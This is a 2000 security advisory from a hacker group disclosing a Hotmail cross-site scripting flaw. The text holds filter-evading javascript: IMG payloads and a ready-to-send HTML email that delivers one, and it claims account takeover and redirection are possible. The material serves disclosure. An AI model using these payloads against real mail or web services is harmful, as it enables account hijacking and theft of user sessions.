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hack-hm-1.1.txt

hack-hm-1.1.txt
Posted May 11, 2000
Authored by Hawaiian Superman

Hotmail is vulnerable to yet another serious security problem involving javascript. Windows, MacOS, and Linux users are affected. Consequences include hotmail account takeover, redirecting a hotmail user to any site, or access to the users computer if combined with other known exploits.

tags | exploit, javascript
systems | linux, windows
SHA-256 | b5c11b65292e58dd2677389be22affdd1c3df87cc7488c5d48a5d785938ef4f6

hack-hm-1.1.txt

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####################[Title]####################
Hotmail Security Alert (Hack HM1.1)! 5/10/2000
By: Da Hawaiian HaXorS
"Give back da aina!"

####################[Disclaimer]####################
In no event shall Da Hawaiian HaXorS be held liable for any special, indirect
or
consequential damages or any damages whatsoever resulting from loss of use,

data or profits, whether in an action of contract, negligence or other
action, arising out of or in connection with the use or performance
of this information.

In Short, we take no responsibility for the information within this document.
The information contained within is our sole opinion and not the responsibility
or opinion of any party we are affiliated with. Whatever anyone does with
this information is entirely of their own accord.

Lastly, anyone currently employed by any county, state, or federal law enforcement
agency is not allow to posses or read this material by command of the authors.
This is for the security community, not for legislative muscle. So DELETE
IT FOOL!
end rant.

####################[Introduction]####################
This document for written to bring attention to security flaws within the
Microsoft Hotmail email system. As we have seen dozens of times
before, javascript poses a security danger to web applications, especially
when
not properly protected.

####################[Scope]####################
The scope of this problem will most likely affect any and all browsers that
have javascript turned on by default. Now lets see here....

That covers all major operating systems. (Windows, MacOS, *nix)
and covers both major browsers. (Internet Explorer 3,4,5 and Netscape 2,
3,4 and 5!?)

So we can safely assume everyone who currently uses Hotmail is at risk regardless
of
their current software. Unless there are a few die-hards who use lynx to
check
thier hotmail account.


####################[Detailed Exploit]####################
The following line will execute a line of JavaScript Code. This
browser feature has been well documented elsewhere.

<IMG SRC="javascript:alert('GameOver, Hax0rs win!');"> /* Example, not
actual exploit */

<IMG SRC="javasc
ript:alert('test');">
Delimiting the string with some HTML Ascii Code Entities will also still
execute.
\09 \10 \11 \12 \13 as delimiters all work.

/* Actual Exploit */
<IMG SRC="javasc ript:alert('test');">


For the script kiddy: (You must send the mail as HTML mail).

MIME-Version: 1.0
From: Script Kiddy <scriptkiddy@wannabe.com>
Content-Type: text/html; charset=us-ascii
Content-Transfer-Encoding: 7bit
Subject: The Script Kiddy Has You OWNED!

<HTML><BODY>
<IMG SRC="javasc ript:alert('test');">
</BODY></HTML>
>.

/* J0l0S2h8fj8i0Ce2ahe027 */

####################[Potential Disasters]####################
The limit to the disastrous consequences of this are limited only to the
skill
and creativity of intruder. So, lets give some examples shall we:

1) Hotmail Account take over. Yes, attacker can gain both username and password
or whatever Hotmail uses to track the session. Not like it matters.

2) Use exploit in conjunction with a KNOWN browser exploits to access the
system.
Hmm. I wonder if JS can be used to exploit an IE security bug, writing a
file
to the system (Can you say "I LOVE YOU"?), and then execute that file. Seems
possible.

3) Re-Direct the user to somewhere else they want.
Wow, wouldn't spammers just love to be able to re-direct a massive amount
of
Hotmail users to some Pr0n site. HAH!

Remember, limited only in creativity.

####################[Suggested Fix]####################
The silver bullet fix would be that Microsoft would take security and the
privacy of its customers seriously with a proactive approach rather than
deny
and post a patch approach.

However, given that is an unreasonable request, we suggest the following:
Removethe ALL carriage returns from string before analyzing it.



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